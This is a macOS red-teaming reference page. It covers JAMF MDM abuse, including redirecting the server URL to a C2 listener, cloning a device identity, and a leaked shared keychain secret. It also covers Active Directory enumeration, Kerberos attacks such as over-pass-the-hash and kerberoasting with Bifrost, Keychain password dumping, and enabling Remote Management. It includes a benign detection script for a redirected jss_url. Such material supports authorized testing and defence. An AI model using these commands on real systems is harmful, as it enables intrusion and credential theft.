
Overview

macOS red teaming differs significantly from Windows-focused engagements. Enterprise Macs are almost always managed by MDM solutions (JAMF, Kandji, Mosyle), frequently integrated with Active Directory, and often used with cloud service credentials. This page covers the most relevant attack paths.
This content is for authorized red team operations only. Always operate strictly within the defined scope of your engagement.

Abusing MDM Solutions

Enumerating MDM Configuration

# Check JAMF connectivity
jamf checkJSSConnection

# Find MDM enrollment profile
profiles show -all

# List MDM-managed configuration profiles
profiles list

JAMF PRO Attacks

Check for self-enrollment at: https://<company-name>.jamfcloud.com/enroll/

If self-enrollment is enabled, it may ask for credentials. Use JamfSniper.py for password spraying.

The jamf binary historically contained a shared keychain secret: jk23ucnq91jfu9aj

JAMF persists via a launchd agent at:

/Library/LaunchAgents/com.jamf.management.agent.plist

The JAMF server URL is stored in:

plutil -convert xml1 -o - /Library/Preferences/com.jamfsoftware.jamf.plist
# Look for: <key>jss_url</key>

An attacker can drop a malicious package that overwrites this file, redirecting the device to a Mythic C2 listener:

# After changing the URL, force immediate reconnection:
sudo jamf policy -id 0
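A defender-side integrity check for the jss_url value described above, written here as an added example (it is not code from the original page or from JAMF): it parses the XML plist output of the plutil command and alerts when the server host is not the expected tenant. The tenant host and the sample plist are constructed placeholders.

```shell
#!/bin/sh
# Added example, not from the original page: detect a redirected JAMF server URL.
# Reads the XML form of com.jamfsoftware.jamf.plist (the plutil output shown
# above), pulls out the jss_url value and compares its host with the tenant you
# expect. EXPECTED_JSS_HOST and SAMPLE_PLIST are constructed placeholders.

EXPECTED_JSS_HOST="acme.jamfcloud.com"   # constructed placeholder tenant

# Print the <string> value that follows <key>jss_url</key> in XML plist text on stdin.
extract_jss_url() {
    awk '
        /<key>jss_url<\/key>/ { want = 1; next }
        want && /<string>/ {
            sub(/.*<string>/, ""); sub(/<\/string>.*/, ""); print; exit
        }'
}

# Return 0 when the URL host equals the expected tenant, 1 otherwise.
check_jss_url() {
    host=$(printf '%s\n' "$1" | sed -e 's#^[A-Za-z]*://##' -e 's#[/:].*$##')
    [ "$host" = "$EXPECTED_JSS_HOST" ]
}

# Constructed sample: what a device redirected to an unexpected server would show.
SAMPLE_PLIST='<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
    <key>jss_url</key>
    <string>https://unexpected-host.example.net:8443/</string>
</dict>
</plist>'

# On a real Mac, feed the live file instead of the sample:
#   sudo plutil -convert xml1 -o - /Library/Preferences/com.jamfsoftware.jamf.plist | extract_jss_url
url=$(printf '%s\n' "$SAMPLE_PLIST" | extract_jss_url)
if check_jss_url "$url"; then
    echo "OK: jss_url points at $EXPECTED_JSS_HOST"
else
    echo "ALERT: jss_url is '$url', expected host $EXPECTED_JSS_HOST" >&2
fi
```

Run it from a periodic launchd job or an MDM-pushed script so a rewritten jss_url is caught before the next check-in rather than after.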
Requirements for impersonating JAMF communications:

  1. Device UUID: ioreg -d2 -c IOPlatformExpertDevice | awk -F\" '/IOPlatformUUID/{print $(NF-1)}'
  2. JAMF keychain: /Library/Application Support/Jamf/JAMF.keychain (contains device certificate)

With these, create a VM with the stolen UUID and cloned keychain.

Monitor /Library/Application Support/Jamf/tmp/ for custom admin scripts — they are placed, executed, and removed. They often contain credentials:

# Monitor JAMF script arguments (no root needed)
watch -n 1 'ps aux | grep -i jamf'

Use JamfExplorer.py to listen for new files and process arguments.

Using MDM as C2

# Install mobileconfig enrollment file (requires root)
# Typically delivered as a pkg; if downloaded as a zip, Safari auto-decompresses it
# Once enrolled, the device trusts the MDM's SSL cert — the MDM can sign any payload

# Mythic agent Orthrus uses this technique

Active Directory Integration

Many macOS systems are bound to Active Directory. Standard AD enumeration applies, plus macOS-specific tools.

Domain Information

echo show com.apple.opendirectoryd.ActiveDirectory | scutil
dsconfigad -show

User Enumeration

# Local users
dscl . ls /Users
dscl . read /Users/<username>

# AD domain users
dscl "/Active Directory/TEST/All Domains" ls /Users
dscl "/Active Directory/TEST/All Domains" read /Users/<username>
dscacheutil -q user

# Computers
dscl "/Active Directory/TEST/All Domains" ls /Computers

# Groups
dscl . ls /Groups
dscl "/Active Directory/TEST/All Domains" ls /Groups

# Domain info
dsconfigad -show

macOS AD Attack Tools

MacHound

BloodHound extension for macOS — collects AD relationships including CanSSH, CanVNC, and CanAE edges.

Bifrost

Objective-C tool using native macOS Heimdal Kerberos APIs. No additional frameworks required on target.

Orchard

JXA (JavaScript for Automation) tool for Active Directory enumeration from macOS.

Kerberos Attacks on macOS

# Request TGT hash (PKINIT)
bifrost --action askhash --username <name> --password <password> --domain <domain>

# Over-Pass-The-Hash: request TGT
bifrost --action asktgt --username <user> --domain <domain.com> \
       --hash <hash> --enctype <enctype> --keytab /path/to/keytab

# Kerberoast
bifrost --action asktgs --spn <service> --domain <domain.com> \
       --username <user> --hash <hash> --enctype <enctype>

# Access shares with obtained tickets
smbutil view //computer.fqdn
mount -t smbfs //server/folder /local/mount/point

BloodHound MacHound Edges

MacHound adds three new edges beyond standard HasSession and AdminTo:

Edge     Meaning
CanSSH   Entity allowed to SSH to host
CanVNC   Entity allowed to VNC to host
CanAE    Entity allowed to execute AppleEvent scripts

Accessing the macOS Keychain

The Keychain stores sensitive information that can facilitate lateral movement:

# List keychains
security list-keychains

# Dump login keychain (may trigger user prompt)
security dump-keychain ~/Library/Keychains/login.keychain-db

# Find specific passwords (prompts user unless already unlocked)
security find-generic-password -l "service_name" -w
security find-internet-password -s "server.example.com" -w

# Unlock keychain (useful in non-interactive sessions)
security unlock-keychain -p <password> ~/Library/Keychains/login.keychain-db

External Service Integration

macOS environments frequently use:
  • OneLogin — synchronized credentials across services
  • GitHub, AWS — accessed via OneLogin
  • Okta, Azure AD — SSO integration
Compromising macOS credentials often means compromising all connected cloud services simultaneously.

Safari Automatic Extraction

When a file is downloaded in Safari, “safe” file types are automatically opened. A downloaded ZIP is automatically decompressed, potentially exposing the user to malicious content without an explicit open action.

macOS Remote Access and Protocols

# Check if SSH is running
sudo launchctl list | grep ssh
systemsetup -getremotelogin

# VNC / ARD (note: this kickstart command enables and configures Remote Management, it does not only check it)
sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart \
     -activate -configure -access -on -users admin -privs -all -restart -agent

# Screen sharing
netstat -an | grep 5900

# AirDrop / Bonjour
dns-sd -B _airdrop._tcp
